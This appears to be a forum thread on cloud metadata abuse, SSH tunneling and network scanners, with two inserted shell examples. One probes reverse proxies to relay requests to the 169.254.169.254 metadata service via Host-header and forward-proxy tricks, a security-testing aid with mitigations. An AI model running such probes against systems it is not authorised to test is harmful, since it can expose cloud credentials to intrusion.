If anyone is curious about how this can be abused, here's my "There's no place like 169.254.169.254 - (Ab)using cloud metadata URLs" slides [1] and talk [2] from 2019.
tl;dr - misconfigured reverse proxies allowed cloud metadata URL access across the bigger cloud providers.
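A quick way to check a reverse proxy for the class of misconfiguration the comment above describes, added here as an example (this is not code from the linked slides or talk): send a normal-looking request through the proxy but set the Host header to the metadata IP, with the extra marker header that GCP and Azure require, and see whether what comes back looks like a metadata listing. The target URL is a placeholder and the response markers are a heuristic.

```shell
#!/bin/sh
# Added example, not from the linked slides or talk: probe whether a
# reverse proxy routes on the client-supplied Host header and will relay
# a request to the instance metadata service behind it. The target URL
# is a placeholder; run this only against systems you are authorised to
# test.

IMDS=169.254.169.254

# Classify a response body. The markers are the documented top-level
# entries of each provider's metadata root: AWS returns a directory
# listing containing ami-id/instance-id, GCP lists instance/ and
# project/, Azure returns JSON with a "compute" object. Prints the
# provider and returns 0 on a hit, returns 1 otherwise. Heuristic only.
looks_like_metadata() {
  case "$1" in
    *ami-id*|*instance-id*)  echo aws ;;
    *\"compute\"*)           echo azure ;;
    *instance/*|*project/*)  echo gcp ;;
    *)                       return 1 ;;
  esac
}

# One request through the proxy: the URL path is what the proxy sees,
# but the Host header names the metadata IP. A proxy that builds its
# upstream from the request Host (e.g. nginx proxy_pass using $host, or
# Apache with ProxyPreserveHost and catch-all routing) hands the request
# to IMDS. GCP and Azure additionally demand a marker header, which a
# proxy that forwards arbitrary client headers passes along unchanged.
probe_one() {  # $1 base URL  $2 path  $3 provider header or ""
  if [ -n "$3" ]; then
    body=$(curl -sS -m 5 -H "Host: $IMDS" -H "$3" "$1$2" 2>/dev/null) || return 1
  else
    body=$(curl -sS -m 5 -H "Host: $IMDS" "$1$2" 2>/dev/null) || return 1
  fi
  looks_like_metadata "$body"
}

# Try the three providers in turn; prints the first provider that answers.
probe() {  # $1 base URL of the reverse proxy, e.g. https://app.example.com
  probe_one "$1" /latest/meta-data/ "" ||
  probe_one "$1" /computeMetadata/v1/ "Metadata-Flavor: Google" ||
  probe_one "$1" "/metadata/instance?api-version=2021-02-01" "Metadata: true"
}

# Usage (makes network requests, so not executed here):
#   probe https://app.example.com
```

Two caveats. A proxy can also be reachable as an open forward proxy (`curl -x http://proxy:80 http://169.254.169.254/`) rather than through the Host header, so test both. On the defensive side, pinning `proxy_pass` to a fixed upstream instead of deriving it from the request, and on AWS requiring IMDSv2 (the session token is fetched with a PUT, which a plain GET relay cannot do) with a hop limit of 1, closes the path this probe exercises.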
One thing I’ve always tried to find is a method of forwarding a local port on server A to a public facing port on server B. Googling this is very difficult. Is that possible with ssh?
I’ve also had this issue for quite some time and I’ve used a few approaches over the years. My most recent approach has been to connect server A to server B via WireGuard. Then on server B I use nginx to reverse proxy the WireGuard IP address of server A. This works nicely when:
1) you have access to install software on server A, but it’s stuck behind a bunch of firewalls.
2) You’re trying to expose HTTP services; it’s possible to “stream” non-HTTP with nginx, but I don’t know enough to recommend that.
You might also want to look at Apache Guacamole or Boring Proxy. I’d love other recommendations!
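For the question asked above (local port on server A to a public-facing port on server B, with plain ssh), here is an added example that is not part of the thread: an OpenSSH reverse forward (`ssh -R`) does exactly this, but whether the listener on B ends up on the public interface or only on B's loopback is decided by B's `GatewayPorts` setting, not by the `-R` argument. The script reads that setting from an sshd_config excerpt (a constructed sample) and prints the matching `-R` bind spec. Host names, user and ports are assumptions.

```shell
#!/bin/sh
# Added example, not from the thread: publish a service that listens on
# 127.0.0.1:3000 on server A as port 8080 on the public interface of
# server B with an OpenSSH reverse forward. Hosts, users and ports are
# assumptions.
#
#   A$ ssh -N -R 0.0.0.0:8080:127.0.0.1:3000 tunnel@serverB
#
# With sshd's default "GatewayPorts no", B silently rebinds that
# listener to its loopback, so the forward works from B itself but not
# from the Internet. The functions below make the setting explicit.

# Effective global GatewayPorts value from an sshd_config body on stdin.
# OpenSSH keeps the FIRST occurrence of a keyword and ignores later
# duplicates; if absent the default is "no". Lines inside Match blocks
# are skipped here (on B itself, `sshd -T` prints the value sshd
# actually applies, Match blocks included).
gateway_ports() {
  awk '
    tolower($1) == "match"                               { in_match = 1 }
    !in_match && !found && tolower($1) == "gatewayports" { print tolower($2); found = 1 }
    END                                                  { if (!found) print "no" }
  '
}

# The -R bind spec to use on A for a given GatewayPorts value:
#   yes             -> sshd forces every remote forward onto the wildcard
#                      address, so no bind address is needed
#   clientspecified -> the client chooses; ask for 0.0.0.0 explicitly
#   no              -> loopback only; nginx (or another proxy) on B must
#                      forward its public port to 127.0.0.1:<public port>
bind_spec() {  # $1 GatewayPorts value  $2 public port on B  $3 local port on A
  case "$1" in
    yes)             echo "$2:127.0.0.1:$3" ;;
    clientspecified) echo "0.0.0.0:$2:127.0.0.1:$3" ;;
    *)               echo "127.0.0.1:$2:127.0.0.1:$3" ;;
  esac
}

# Constructed sshd_config excerpt: the first GatewayPorts line wins, the
# duplicate below it is ignored, and the Match-scoped one applies only
# to user "deploy".
SAMPLE_SSHD_CONFIG='Port 22
GatewayPorts clientspecified
GatewayPorts no
Match User deploy
    GatewayPorts yes
'

mode=$(printf '%s' "$SAMPLE_SSHD_CONFIG" | gateway_ports)
echo "effective GatewayPorts: $mode"
echo "run on A:   ssh -N -R $(bind_spec "$mode" 8080 3000) tunnel@serverB"
echo "check on B: ss -ltn | grep ':8080 '"
```

If you do turn on `GatewayPorts` for this, scope it to a dedicated tunnel user with a `Match User` block and add `PermitListen 8080` there so that user can only open the port you intend; with `GatewayPorts no` left in place, the loopback-bound listener fronted by nginx (`proxy_pass http://127.0.0.1:8080;`) gives the same result as the WireGuard setup described above, with nginx handling TLS and access control.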
I made this free to the HN community a few years back [1], but decided to make it available to everyone via a GitHub repo. There is a paid interactive lab portion (details in the repo) if you are looking for hands-on experience.
Book Overview
This book is packed with practical, real-world examples of SSH tunneling and port redirection in multiple realistic scenarios. It walks you through the basics of SSH tunneling (both local and remote port forwards), SOCKS proxies, port redirection, and how to use them with other tools like proxychains, nmap, Metasploit, and web browsers.
Advanced topics include SSHing through 4 jump boxes, throwing exploits through SSH tunnels, scanning assets using proxychains and Metasploit's Meterpreter, browsing the Internet through a SOCKS proxy, using proxychains and nmap to scan targets, and leveraging Metasploit's Meterpreter portfwd command.
Glad to see more open source options (I develop and maintain Scantron https://github.com/rackerlabs/scantron/) when it comes to network scanning! Appreciate your contribution to the community.
So you're not using nmap under the hood?
What's the largest IP space you've tested it on so far?
Scantron looks pretty awesome! liwasc isn't using nmap internally; the entire network scanner part (https://github.com/pojntfx/liwasc/blob/main/pkg/scanners/nod...) is <150 SLOC and the port scanner is <250 SLOC. Go has some really nice low-level networking APIs, especially when combined with `gopacket`.
I haven't really tested it on anything larger than /28 - it should probably work on larger ones as well though (it limits the maximum concurrent port & network scans so that ulimit etc. aren't an issue) :)